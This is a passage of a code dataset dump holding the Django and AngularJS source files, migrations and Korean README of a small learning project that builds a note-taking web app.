$scope.selectNote(0);\n })\n .error(function(data, status) {\n console.log(status);\n });\n });\n\n /**\n * 노트북이 선택되었을때 이벤트\n */\n $scope.$on(\"noteListCtrl:selectNotebook\", function (e, notebookObj, note) {\n $scope.currentNotebook = notebookObj;\n\n noteListSvc\n .getNoteList(notebookObj.id && notebookObj.id || 0)\n .success(function (data, status, headers, config) {\n var index = -1;\n $scope.notebookType = data.notebookType;\n\n $scope.noteList = [];\n _.each(data.data, function (val, idx) {\n if (_.isObject(note) && note.id === val.id ) {\n index = idx;\n }\n $scope.noteList.push(quicksilverModelSvc.createNote(val));\n });\n\n if ( $scope.noteList.length > 0 ) {\n if ( _.isObject(note) ) {\n $scope.selectNote(index);\n } else {\n $scope.selectNote(0);\n }\n }\n });\n });\n\n /**\n * 이전 노트로 이동\n */\n $scope.$on(\"noteListCtrl:prevNote\", function (e) {\n if ( $scope.noteListIndex > 0 ) {\n $scope.selectNote($scope.noteListIndex - 1);\n }\n });\n\n /**\n * 이후 노트로 이동\n */\n $scope.$on(\"noteListCtrl:nextNote\", function (e) {\n if ( $scope.noteListIndex < $scope.noteList.length-1 ) {\n $scope.selectNote($scope.noteListIndex + 1);\n }\n });\n\n /**\n * 검색\n */\n $scope.$on(\"noteListCtrl:searchText\", function (e, searchText) {\n noteListSvc\n .getNoteListSearch(searchText)\n .success(function (data, status, headers, config) {\n $scope.notebookType = data.notebookType;\n\n $scope.noteList = [];\n _.each(data.data, function (val, idx) {\n $scope.noteList.push(quicksilverModelSvc.createNote(val));\n });\n $scope.selectNote(0);\n });\n });\n\n /**\n * 현재 노트북을 감시한다.\n */\n $scope.$watch('currentNotebook', function (newValue, oldValue) {\n console.log(\"watch currentNotebook newValue=\" + newValue + \", oldValue=\" + oldValue);\n }, true);\n\n /**\n * 노트리스트를 감시한다.\n */\n $scope.$watchCollection('noteList', function (newValue, oldValue) {\n $rootScope.$broadcast('recentNoteListCtrl:changeNoteList');\n });\n }])\n .controller('noteContextMenuCtrl', [\n '$scope', '$rootScope', '$element',\n function($scope, $rootScope, $element) {\n 'use strict';\n\n $scope.duplicateNote = function ($event) {\n $rootScope.$broadcast(controllerName + \":duplicateNote\");\n $element.removeClass(\"open\");\n };\n\n $scope.deleteNote = function ($event) {\n $rootScope.$broadcast(controllerName + \":deleteNote\");\n $element.removeClass(\"open\");\n };\n }]);\n})(angular, jQuery, _, window.console&&window.console||{\n log: function() {},\n debug: function() {},\n info: function() {},\n warning: function() {},\n error: function() {}\n});\n\n" }, { "alpha_fraction": 0.44438695907592773, "alphanum_fraction": 0.44542163610458374, "avg_line_length": 34.77777862548828, "blob_id": "99e02d05365a5a3e36772698b97740dd37e53495", "content_id": "981484158ca33c5ce6c9edec9515427572669fef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1989, "license_type": "no_license", "max_line_length": 109, "num_lines": 54, "path": "/DjangoApp/static/js/quicksilver/controllers/recentNoteListCtrl.js", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": ";\n(function (angular, $, _, console) {\n var moduleName = 'quicksilver.controller';\n var controllerName = \"recentNoteListCtrl\";\n\n angular\n .module(moduleName)\n .controller(controllerName, [\n '$scope', '$rootScope', '$timeout', '$element', '$q', 'recentNoteListSvc', 'quicksilverModelSvc',\n function($scope, $rootScope, $timeout, $element, $q, recentNoteListSvc, quicksilverModelSvc) {\n 'use strict';\n\n $scope.recentNoteListIndex = -1;\n $scope.recentNoteList = [];\n\n /**\n * 최근 사용목록 리스트를 갱신한다.\n */\n $scope.refash = function () {\n recentNoteListSvc\n .getRecentNoteList()\n .success(function (data, status, headers, config) {\n $scope.recentNoteListIndex = -1;\n $scope.recentNoteList = [];\n _.each(data.data, function (val, idx) {\n $scope.recentNoteList.push(quicksilverModelSvc.createNote(val));\n });\n });\n };\n\n /**\n * 최근 노트를 클릭한다.\n * @param $index\n */\n $scope.clickRecentNote = function ($index) {\n $rootScope.$broadcast(\"notebookListCtrl:selectNoteBook\", $scope.recentNoteList[$index]);\n };\n\n /**\n * 변경 이벤트\n */\n $scope.$on('recentNoteListCtrl:changeNoteList', function (e) {\n $scope.refash();\n });\n\n $scope.refash();\n }]);\n})(angular, jQuery, _, window.console&&window.console||{\n log: function() {},\n debug: function() {},\n info: function() {},\n warning: function() {},\n error: function() {}\n});\n\n" }, { "alpha_fraction": 0.4055604636669159, "alphanum_fraction": 0.406663715839386, "avg_line_length": 34.67716598510742, "blob_id": "3d89e40e7001f3d419769560c164e028aba404c3", "content_id": "46135f966b42f3c24cf46bb901b6280a4b92f0a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4542, "license_type": "no_license", "max_line_length": 81, "num_lines": 127, "path": "/DjangoApp/static/js/quicksilver/services/service.js", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": ";\n(function (angular, $, _, console) {\n var moduleName = \"quicksilver.service\";\n\n angular.module(moduleName)\n .factory('quicksilverModelSvc', [\n function() {\n\n var _removeHashkey = function(setting) {\n return _.omit(setting||{}, '$$hashKey');\n };\n\n return {\n createNoteBook: function(setting) {\n return _.extendOwn({\n id: 0,\n type: 'notebook', // notebook, search, trash 3가지 종류\n title: 'Untitled Notebook',\n isDelete: false,\n isModify: false,\n isFocus: false,\n regDate: '',\n modifyDate: '',\n deleteDate: '',\n noteCnt: 0\n }, setting||{});\n },\n createNote: function(setting) {\n return _.extendOwn({\n id: 0,\n title: 'Untitled Note',\n content: '',\n isDelete: false,\n isFocus: false,\n regDate: '',\n modifyDate: '',\n deleteDate: '',\n notebook: 0 // NoteBook의 id\n }, setting||{});\n },\n copyNoteBook: function(setting, bDeleteHashKey) {\n if ( bDeleteHashKey || true ) {\n setting = _removeHashkey(setting)\n }\n return this.createNoteBook(setting);\n },\n copyNote: function(setting, bDeleteHashKey) {\n if ( bDeleteHashKey || true ) {\n setting = _removeHashkey(setting)\n }\n return this.createNote(setting);\n }\n };\n }])\n .factory('notebookListSvc', [\n '$http',\n function ($http) {\n\n return {\n getNoteBookList: function() {\n return $http.get(\"/quicksilver/notebook\");\n },\n addNoteBook: function(notebook) {\n console.log(\"addNoteBook\", notebook);\n return $http.put(\"/quicksilver/notebook\", {data:notebook});\n },\n deleteNoteBook: function(notebook) {\n console.log(\"deleteNoteBook\", notebook);\n return $http.delete(\"/quicksilver/notebook/\"+notebook.id);\n },\n getTrashNoteList: function() {\n return $http.get(\"/quicksilver/trash\");\n },\n deleteTrashNoteList: function() {\n return $http.delete(\"/quicksilver/trash\");\n }\n };\n }])\n .factory('noteListSvc', [\n '$http',\n function ($http) {\n\n return {\n getNoteList: function(notebook_id) {\n return $http.get(\"/quicksilver/notelist/\"+notebook_id);\n },\n getNoteListSearch: function(searchText) {\n return $http.get(\"/quicksilver/notelist/search/\"+searchText);\n }\n };\n }])\n .factory('recentNoteListSvc', [\n '$http',\n function ($http) {\n\n return {\n getRecentNoteList: function() {\n return $http.get(\"/quicksilver/recentnote\");\n }\n };\n }])\n .factory('noteSvc', [\n '$http',\n function ($http) {\n\n return {\n getNote: function(noteObj) {\n return $http.get(\"/quicksilver/note/\" + noteObj.id);\n },\n addNote: function(noteObj) {\n return $http.put(\"/quicksilver/note\", {data:noteObj});\n },\n deleteNote: function(noteObj) {\n return $http.delete(\"/quicksilver/note/\"+noteObj.id);\n },\n trashDeleteNote: function(noteObj) {\n return $http.delete(\"/quicksilver/trash/\" + noteObj.id);\n }\n };\n }]);\n})(angular, jQuery, _, window.console&&window.console||{\n log: function() {},\n debug: function() {},\n info: function() {},\n warning: function() {},\n error: function() {}\n});\n\n" }, { "alpha_fraction": 0.7064515948295593, "alphanum_fraction": 0.7064515948295593, "avg_line_length": 33.44444274902344, "blob_id": "fabc6259a271f902c3f52c86001b81ada20daec4", "content_id": "8a36871d68c652f91958e6f6c9995c149e8a4797", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 80, "num_lines": 9, "path": "/DjangoApp/DjangoApp/urls.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom quicksilver.views import HomeView\n\nurlpatterns = [\n url(r'^$', HomeView.as_view(), name=\"home\"),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^quicksilver/', include('quicksilver.urls', namespace='quicksilver')),\n]\n" }, { "alpha_fraction": 0.4736842215061188, "alphanum_fraction": 0.4736842215061188, "avg_line_length": 18, "blob_id": "34a5c4e8b8e293a4950eea7e823032242f1c8440", "content_id": "9f62ca74b3dbd0c09319f5524279389ec4a1a614", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19, "license_type": "no_license", "max_line_length": 18, "num_lines": 1, "path": "/DjangoApp/quicksilver/decorations/__init__.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "__author__ = 'kdj'\n" }, { "alpha_fraction": 0.4833029806613922, "alphanum_fraction": 0.48512446880340576, "avg_line_length": 35.599998474121094, "blob_id": "5c0df4e03088ff5bcd69cd93558c4c0f0ba2ca7a", "content_id": "1c45a573b4e1136d74c20097419691fbb51d74d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1647, "license_type": "no_license", "max_line_length": 104, "num_lines": 45, "path": "/DjangoApp/static/js/quicksilver/app.js", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": ";\n(function (angular, $, _, console) {\n 'use strict';\n\n angular.module('quicksilver', ['ngRoute', 'quicksilver.controller', 'quicksilver.service']);\n angular.module('quicksilver.controller' , ['summernote', 'ng-context-menu', 'quicksilver.service']);\n angular.module('quicksilver.service' , []);\n\n angular\n .module('quicksilver')\n .constant('myConfig', {\n })\n .config([\n '$routeProvider', '$httpProvider', '$filterProvider',\n function ($routeProvider, $httpProvider, $filterProvider) {\n 'use strict';\n\n console.debug(\"config\");\n $httpProvider.defaults.xsrfCookieName = 'csrftoken';\n $httpProvider.defaults.xsrfHeaderName = 'X-CSRFToken';\n\n $filterProvider.register('shortcut', function () {\n return function (text, len) {\n if ( text.length > len ) {\n var head = (len/2) + (len%2);\n var tail = len - head;\n return text.substr(0, head) + \" ... \" + text.substr(-tail);\n }\n return text;\n };\n });\n\n $routeProvider\n .when(\"/note\", {templateUrl: 'quicksilver/tpl/note', controller: 'noteCtrl'});\n }])\n .run(function() {\n location.href = \"#/note\";\n });\n})(angular, jQuery, _, window.console&&window.console||{\n log: function() {},\n debug: function() {},\n info: function() {},\n warning: function() {},\n error: function() {}\n});\n" }, { "alpha_fraction": 0.6694444417953491, "alphanum_fraction": 0.6888889074325562, "avg_line_length": 28.189189910888672, "blob_id": "37f284568a55df7b940de1156ea859f8a595a0a3", "content_id": "546c86cda6c77b42b50338f94f186cea42ed79b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1212, "license_type": "no_license", "max_line_length": 94, "num_lines": 37, "path": "/README.md", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "# Learning Python\n\n![demo](https://raw.githubusercontent.com/daejoon/learning-python/master/docs/quicksilver.png)\n\nDjanggo와 AngularJs를 이용한 노트 앱입니다.\n\n시작은 파이썬 배워보기 위한 프로젝트인데 어째 AngularJS 쪽으로 무게중심이 가버렸습니다.\n\n## Server-Side Stack\n- [Python](https://www.python.org/) `2.7.14`\n- [Django](https://www.djangoproject.com/) `1.11.10`\n\n## Client-Side Stack\n- [jQuery](http://jquery.com)\n- [Underscorejs](http://underscorejs.org/)\n- [Suummernote](http://summernote.org/)\n- [Bootstrap](http://getbootstrap.com/)\n- [font-awesome](http://fortawesome.github.io/Font-Awesome/)\n- [AngularJS](https://www.angularjs.org/)\n- [Angular-summernote](https://github.com/summernote/angular-summernote)\n- [Angular-ui-bootstrap](https://github.com/angular-ui/bootstrap)\n- [ng-context-menu](https://github.com/ianwalter/ng-context-menu)\n\n## 실행방법\n- `DjangoApp` 폴더로 이동\n ```\n $ cd DjangoApp\n ```\n- `python manage.py migrate` 입력\n ```\n $ python manage.py migrate\n ```\n- `python manage.py runserver 8888` 입력\n ```\n $ python manage.py runserver 8888\n ```\n- 브라우저에서 `http://localhost:8888` 입력\n" }, { "alpha_fraction": 0.8035714030265808, "alphanum_fraction": 0.8035714030265808, "avg_line_length": 17.66666603088379, "blob_id": "e63be1b6a98c7c6c85556d0f2b3e985131858657", "content_id": "c7a7b840e3bbf37d403b8dc9dd491a548b3d0a4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 168, "license_type": "no_license", "max_line_length": 45, "num_lines": 9, "path": "/DjangoApp/quicksilver/admin.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\nfrom quicksilver.models import NoteBook, Note\n\n\n# Register your models here.\n\nadmin.site.register(NoteBook)\nadmin.site.register(Note)\n" }, { "alpha_fraction": 0.5667556524276733, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 36.45000076293945, "blob_id": "cf408aa25ea9da2ba420343116295463b95e10a0", "content_id": "aedeb70cc1fda98138972f4f5983e1ad28b969ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1498, "license_type": "no_license", "max_line_length": 114, "num_lines": 40, "path": "/DjangoApp/quicksilver/migrations/0001_initial.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Note',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('content', models.TextField(null=True)),\n ('isDelete', models.BooleanField(default=False)),\n ('regDate', models.DateTimeField(default=django.utils.timezone.now)),\n ('modifyDate', models.DateTimeField(default=django.utils.timezone.now)),\n ],\n ),\n migrations.CreateModel(\n name='NoteBook',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('isDelete', models.BooleanField(default=False)),\n ('regDate', models.DateTimeField(default=django.utils.timezone.now)),\n ('modifyDate', models.DateTimeField(default=django.utils.timezone.now)),\n ],\n ),\n migrations.AddField(\n model_name='note',\n name='notebook',\n field=models.ForeignKey(to='quicksilver.NoteBook'),\n ),\n ]\n" }, { "alpha_fraction": 0.643552303314209, "alphanum_fraction": 0.643552303314209, "avg_line_length": 53.79999923706055, "blob_id": "1f41d702a7a343a5cf0bef324632c705af003618", "content_id": "80cd7e4949fc50a6d492dce52976aceea12e19a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 822, "license_type": "no_license", "max_line_length": 123, "num_lines": 15, "path": "/DjangoApp/quicksilver/urls.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\n\nfrom quicksilver.views import HomeView, AngularTplView, NotebookListView, TrashView, RecentNoteView, NoteListView, NoteView\n\n\nurlpatterns = [\n url(r'^$', HomeView.as_view(), name=\"home\"),\n url(r'^tpl/?(?P<page_name>.+)$', AngularTplView.as_view(), name=\"angular_tpl\"),\n url(r'^notebook/?(?P<notebook_id>-?\\d+)?$', NotebookListView.as_view(), name=\"notebookList\"),\n url(r'^trash/?(?P<note_id>-?\\d+)?$', TrashView.as_view(), name='trash'),\n url(r'^recentnote/?$', RecentNoteView.as_view(), name='recentnote'),\n url(r'^notelist/?(?P<notebook_id>-?\\d+)$', NoteListView.as_view(), name='notelist'),\n url(r'^notelist/search/?(?P<search_text>.+)$', NoteListView.as_view(), name='notelist_search'),\n url(r'^note/?(?P<note_id>-?\\d+)?$', NoteView.as_view(), name='note'),\n]\n" }, { "alpha_fraction": 0.550000011920929, "alphanum_fraction": 0.550000011920929, "avg_line_length": 28, "blob_id": "681e45ae51a41303a5b10d0e1861bacffb4f2b41", "content_id": "b5624951f3a49d9f5b38d486792f44400979eb5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 320, "license_type": "no_license", "max_line_length": 42, "num_lines": 11, "path": "/DjangoApp/quicksilver/decorations/set_variable.py", "repo_name": "daejoon/learning-python", "src_encoding": "UTF-8", "text": "__author__ = 'kdj'\n\ndef setTplViewVariable(name, value):\n def decorator_func(func):\n def wrapper_func(*args, **kwargs):\n ret = func(*args, **kwargs)\n if isinstance(ret, dict):\n ret[name] = value\n return ret\n return wrapper_func\n return decorator_func\n\n" } ]
15
Jonathanlinus/WebBlocaker
https://github.com/Jonathanlinus/WebBlocaker
10792e0665f9fd0f1ea6149ecff7ac73aa20f0f4
5bbb9d660c956c862ac5d135b0ae9db9af8b30cf
fdcf7421691891b9bcfa8e6ca671a7283f215da5
refs/heads/master
2020-04-21T23:45:54.420089
2019-02-10T11:32:28
2019-02-10T11:32:28
169,956,722
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6571428775787354, "alphanum_fraction": 0.6979591846466064, "avg_line_length": 21.090909957885742, "blob_id": "cc2cda6fdc3feee55b5f9a594c8be44ff48b3324", "content_id": "f5f96cfd4940e6065a8bae564ead437c225004aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 245, "license_type": "no_license", "max_line_length": 54, "num_lines": 11, "path": "/website_blocker.py", "repo_name": "Jonathanlinus/WebBlocaker", "src_encoding": "UTF-8", "text": "import time\nfrom datetime import datetime as dt\n\n#we can use r:\"C:\\windows....\nhost_path=\"C:\\\\Windows\\\\system32\\\\drivers\\\\etc\\\\hosts\"\nredirect=\"127.0.0.1\"\nwebsite_list=[\"www.facebook.com\", \"facebook.com\"]\n\nwhile True:\n\tprint(1)\n\ttime.sleep(5)\n\t\n" } ]
1
coderboom/UheDev
https://github.com/coderboom/UheDev
60fe25be9e8cf4bc9a879ab4f2659494c1c064d1
3b7e7edd39726055673984ce16fc2dd6e1636f2a
fddc40d527ac5213a124a1d866b9bf0202a91653
refs/heads/master
2020-03-22T15:54:27.095687
2018-07-09T14:25:04
2018-07-09T14:25:04
140,252,620
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.778181791305542, "alphanum_fraction": 0.778181791305542, "avg_line_length": 26.5, "blob_id": "c66ef1a8217f0e60a9e8f83420b25eebbb07c8d4", "content_id": "3f9f9b8b405847ba2cd3d072f75d8ad1dfa6ab74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 598, "license_type": "no_license", "max_line_length": 81, "num_lines": 20, "path": "/DevPurchase/LoginModule/TestRun.py", "repo_name": "coderboom/UheDev", "src_encoding": "UTF-8", "text": "import HTMLTestRunner\nfrom DevPurchase.LoginModule import LoginTestCase\nimport os\nimport unittest\n# get the directory path to output report file\ndir = os .getcwd()\n\n# 需要测试的测试用例\nLogin_Test = unittest.TestLoader().loadTestsFromTestCase(LoginTestCase.TestLogin)\n# 加载所有的 test case\ntest_suite = unittest.TestSuite([Login_Test, ])\n\n# open the report file\noutputfile = open(dir+'\\\\SeleniumTestLogin.html', 'wb')\n\n# 配置\nrunner = HTMLTestRunner.HTMLTestRunner(\n stream=outputfile, title=\"登陆测试\", description='Acceptance Tests')\n# 开始运行\nrunner.run(test_suite)\n" }, { "alpha_fraction": 0.2978723347187042, "alphanum_fraction": 0.2978723347187042, "avg_line_length": 23, "blob_id": "69743c2d63ecea8b76eb91842e3b9d2586013fff", "content_id": "c4bde544a61d280ae24e0fbadb16d33de8c95a36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47, "license_type": "no_license", "max_line_length": 36, "num_lines": 2, "path": "/DevPurchase/Webtools/Web.py", "repo_name": "coderboom/UheDev", "src_encoding": "UTF-8", "text": "import abc\nprint('---------------------------')" }, { "alpha_fraction": 0.6274864673614502, "alphanum_fraction": 0.6374322175979614, "avg_line_length": 34.11111068725586, "blob_id": "fca9d81f3fa16973d533f4fe51342e0e9fe13c11", "content_id": "66d65260cc27dab6d8d1347426c08872bb862ee0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2246, "license_type": "no_license", "max_line_length": 105, "num_lines": 63, "path": "/DevPurchase/LoginModule/LoginTestCase.py", "repo_name": "coderboom/UheDev", "src_encoding": "UTF-8", "text": "import unittest\nimport selenium\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common import keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\n\n\nclass TestLogin(unittest.TestCase):\n def setUp(self):\n self.browser = webdriver.Chrome()\n self.browser.implicitly_wait(3)\n self.base_url = 'http://dev.uhetrip.com:13215/signin?ref=root'\n\n def test_login(self):\n browser = self.browser\n browser.get(self.base_url)\n browser.maximize_window()\n browser.implicitly_wait(5)\n\n user_name = 'lisisi'\n user_pwd = 'aa2345'\n\n user_name_element = 'username'\n user_pwd_element = 'password'\n identify_code_element = '//*[@id=\"siginBoxCard\"]/div[2]/form/div[3]/div/div[1]/div/div/div/input'\n loading_btn_element = 'isloading_btn'\n submenu_title_element = '/html/body/div[1]/div/div/div/div[2]/ul/li[4]/div'\n \n user_name_input = browser.find_element_by_id(user_name_element)\n user_name_input.is_displayed()\n user_pwd_input = browser.find_element_by_id(user_pwd_element)\n user_pwd_input.is_displayed()\n identify_code_input = browser.find_element_by_xpath(\n identify_code_element)\n identify_code_input.is_displayed()\n loading_btn_click = browser.find_element_by_id(loading_btn_element)\n loading_btn_click.is_displayed()\n\n user_name_input.send_keys(user_name)\n user_pwd_input.send_keys(user_pwd)\n identify_code_input.send_keys('0328')\n loading_btn_click.click()\n\n browser.implicitly_wait(10)\n # submenu_title_text = browser.find_element_by_xpath(\n # '/html/body/div[1]/div/div/div/div[2]/ul/li[4]/div').getText()\n # 定位到标签,用 .text获取text\n submenu_title_text = browser.find_element_by_xpath(\n submenu_title_element).text\n if submenu_title_text == user_name:\n print('登陆成功')\n else:\n print('登陆失败')\n \n def tearDown(self):\n self.browser.quit()\n\n\nif __name__ == '__main__':\n unittest.main()\n" } ]
3
TanyaKalistruk/TheoryCompLab2
https://github.com/TanyaKalistruk/TheoryCompLab2
cc84ec2b17ad81144bbd5a139ef28ee6e9d329b7
7aca2f18685fc4820f2e24f03f4b8872d89822a1
9252ff35391c9c6b79386fe1426de56c2e30a9db
refs/heads/master
2022-04-22T20:38:07.081088
2020-04-25T13:54:19
2020-04-25T13:54:19
255,076,958
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.40329834818840027, "alphanum_fraction": 0.45327335596084595, "avg_line_length": 24.012500762939453, "blob_id": "662b0e2c31ed23534dc283192fba1c615ac16300", "content_id": "f118e7a3ccacbf87c218fe4ed785a33b72974be3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2001, "license_type": "no_license", "max_line_length": 90, "num_lines": 80, "path": "/lab3/main_part.py", "repo_name": "TanyaKalistruk/TheoryCompLab2", "src_encoding": "UTF-8", "text": "import os\n\nmeaning = (\"KeyWordCancel\", \"KeyWordCall\", \"FourSingNumber123\")\n\nmatrix = (\n (1, 4, 0, 0, 0, 0, -4),\n (2, 4, 0, 0, 0, 0, -4),\n (3, 4, 0, 0, 0, 0, -4),\n (-1, 4, 0, 0, 0, 0, -4),\n (1, 4, 5, 0, 0, 0, -4),\n (1, 4, 0, 6, 7, 0, -4),\n (1, 4, 0, -2, 0, 0, -4),\n (1, 8, 0, 0, 0, 0, -4),\n (1, 4, 5, 0, 0, 9, -4),\n (1, 4, 0, -3, 0, 0, -4)\n)\n\n\ndef classify_symbol(symbol: str) -> int:\n \"\"\"Return the class of passed symbol\"\"\"\n if symbol in ('1', '2', '3'):\n return 0\n elif symbol == 'c':\n return 1\n elif symbol == 'a':\n return 2\n elif symbol == 'l':\n return 3\n elif symbol == 'n':\n return 4\n elif symbol == 'e':\n return 5\n else:\n return 6\n\n\ndef write_to_file(message, *args):\n \"\"\"Write messages to a file\"\"\"\n with open(\"output.txt\", \"a+\") as file:\n file.write(message)\n file.write('\\n')\n for arg in args:\n file.write(arg)\n file.write('\\n')\n\n\ndef analyze(string: str):\n \"\"\"Analyze string from file\"\"\"\n st = 0\n i = 0\n begin = i\n while i < len(string):\n symbol = string[i]\n cl = classify_symbol(symbol)\n st = matrix[st][cl]\n if st == 1 or st == 4 or st == 0:\n begin = i\n if st == 5:\n begin = i - 1\n i += 1\n if st == -1 or st == -2 or st == -3:\n to_write = string[begin:i]\n write_to_file(\"<{token}, {type}>\".format(token=meaning[st], type=to_write))\n st = 0\n begin = i\n elif st == -4:\n st = 0\n begin = i\n\n\nif __name__ == '__main__':\n line_num = 1\n with open(\"input.txt\", \"r\") as line_to_read:\n lines = line_to_read.readlines()\n os.remove(\"output.txt\")\n for line in lines:\n line_without_eof = line.split('\\n')[0]\n write_to_file(\"\", \"Line number %i\" % line_num, \"The string is:\", line_without_eof)\n analyze(line_without_eof)\n line_num += 1\n" }, { "alpha_fraction": 0.4979720115661621, "alphanum_fraction": 0.5032055377960205, "avg_line_length": 39.439151763916016, "blob_id": "d83bc84e763f4d3425ee9821ba2ad4a9fceaa306", "content_id": "5a14215d27a0bd30e4501bd1c12760bc1edcbaf6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7643, "license_type": "no_license", "max_line_length": 114, "num_lines": 189, "path": "/leks_analyzator/leks_analyzator.py", "repo_name": "TanyaKalistruk/TheoryCompLab2", "src_encoding": "UTF-8", "text": "import os\n\nkey_word_type = 'KeyWordType'\nkey_word_int = 'KeyWordInt'\nkey_word_record = 'KeyWordRecord'\nkey_word_end = 'KeyWordEnd'\nsign_equal = 'SignEqual'\nsign_colon = 'SignColon'\nsign_semicolon = 'SignSemicolon'\nid_alpha = 'IdAlpha'\nid_alphabet_ab12 = 'IdAlphabetAB12'\n\n\nclass LeksAnaliz:\n\n def __init__(self, line: int, string: str):\n self.string = string\n self.dict_defines = {key_word_type: 'type',\n key_word_int: 'int',\n key_word_record: 'record',\n key_word_end: 'end',\n sign_equal: '=',\n sign_colon: ':',\n sign_semicolon: ';',\n id_alpha: 'alpha',\n id_alphabet_ab12: ['a', 'b', '1', '2']}\n self.line = line\n self.position = -1\n self.start_position = 0\n\n def get_token(self):\n \"\"\"Print word/sing/id and define it\"\"\"\n self.position += 1\n try:\n symbol = self.string[self.position]\n if symbol == 't':\n self.check_key_word_type()\n elif symbol == 'i':\n self.check_key_word_int()\n elif symbol == 'r':\n self.check_key_word_record()\n elif symbol == 'e':\n self.check_key_word_end()\n elif symbol in ('a', 'b'):\n self.check_ids()\n elif symbol == ';':\n self.write_to_file(\"<{token}, {type}>\".format(token=symbol, type=sign_semicolon))\n self.get_token()\n elif symbol == ':':\n self.write_to_file(\"<{token}, {type}>\".format(token=symbol, type=sign_colon))\n self.get_token()\n elif symbol == '=':\n self.write_to_file(\"<{token}, {type}>\".format(token=symbol, type=sign_equal))\n self.get_token()\n elif symbol == ' ':\n self.get_token()\n else:\n self.error(\"Unknown symbol {}\".format(symbol))\n except:\n pass\n\n def error(self, error):\n \"\"\"Write found error\"\"\"\n self.write_to_file(\n \"Error in line {line}, position {position}, message: {message}\".format(line=self.line,\n position=self.position,\n message=error),\n \"\", \"\")\n\n def check_alpha_id(self, start_position):\n \"\"\"Checks if it is alpha id\"\"\"\n word_to_check = self.dict_defines[id_alpha]\n self.position += 1\n symbol = self.string[self.position]\n while symbol == word_to_check[self.position - start_position]:\n if self.position - start_position == len(word_to_check) - 1:\n self.write_to_file(\"<{token}, {type}>\".format(token=self.string[start_position:self.position + 1],\n type=id_alpha))\n self.get_token()\n break\n self.position += 1\n symbol = self.string[self.position]\n else:\n self.error(\"It is not an id 'alpha'\")\n\n def check_key_word_end(self):\n \"\"\"Checks if it is a key word end\"\"\"\n word_to_check = self.dict_defines[key_word_end]\n start_position = self.position\n self.position += 1\n symbol = self.string[self.position]\n while symbol == word_to_check[self.position - start_position]:\n if self.position - start_position == len(word_to_check) - 1:\n self.write_to_file(\"<{token}, {type}>\".format(token=word_to_check, type=key_word_end))\n self.get_token()\n break\n self.position += 1\n symbol = self.string[self.position]\n else:\n self.error(\"It is not a key word 'end'\")\n\n def check_key_word_int(self):\n \"\"\"Checks if it is key word int\"\"\"\n word_to_check = self.dict_defines[key_word_int]\n start_position = self.position\n self.position += 1\n symbol = self.string[self.position]\n while symbol == word_to_check[self.position - start_position]:\n if self.position - start_position == len(word_to_check) - 1:\n self.write_to_file(\"<{token}, {type}>\".format(token=word_to_check, type=key_word_int))\n self.get_token()\n break\n self.position += 1\n symbol = self.string[self.position]\n else:\n self.error(\"It is not a key word 'int'\")\n\n def check_key_word_record(self):\n \"\"\"Checks if it is a key word record\"\"\"\n word_to_check = self.dict_defines[key_word_record]\n start_position = self.position\n self.position += 1\n symbol = self.string[self.position]\n while symbol == word_to_check[self.position - start_position]:\n if self.position - start_position == len(word_to_check) - 1:\n self.write_to_file(\"<{token}, {type}>\".format(token=word_to_check, type=key_word_record))\n self.get_token()\n break\n self.position += 1\n symbol = self.string[self.position]\n else:\n self.error(\"It is not a key word 'record'\")\n\n def check_ids(self):\n \"\"\"Check it is id alpha or id in alphabet {a, b, 1, 2}\"\"\"\n start_position = self.position\n self.position += 1\n symbol = self.string[self.position]\n if symbol == 'l' and self.string[start_position] == 'a':\n self.check_alpha_id(start_position)\n else:\n while symbol in self.dict_defines[id_alphabet_ab12]:\n self.position += 1\n 